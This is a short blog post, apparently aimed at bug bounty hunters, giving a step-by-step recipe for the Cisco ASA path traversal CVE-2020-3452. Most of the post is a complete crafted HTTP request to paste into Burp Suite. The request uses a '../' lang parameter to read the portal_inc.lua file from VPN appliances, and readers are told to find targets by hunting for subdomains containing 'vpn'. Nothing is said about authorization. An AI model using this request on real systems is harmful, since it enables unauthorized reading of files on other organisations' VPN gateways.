How to find Cisco ASA Path Traversal (CVE-2020–3452) easily

this blog is about teaching you how you can find Cisco ASA Path Traversal (CVE-2020–3452)

  1. find the subdomain containing vpn in it example “vpn.buggywebsite.com” “vpn02.buggywebsite.com” etc.
  2. open burp suite Repeater tab and paste this request

GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1

Host: vpn.buggywebsite.com

Connection: close

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: none

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Accept-Encoding: gzip, deflate

Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

Cookie: tg=0T0tUQV8yRkFfVlBO; webvpnlogin=1; webvpnLang=en

*important- add enter 3 times after pasting this request to add 3 lines at the last of request

if its like this then its vulnerable

thats all my friend , hope you find this vulnerability, if you like this post the please share this with your friends

cheers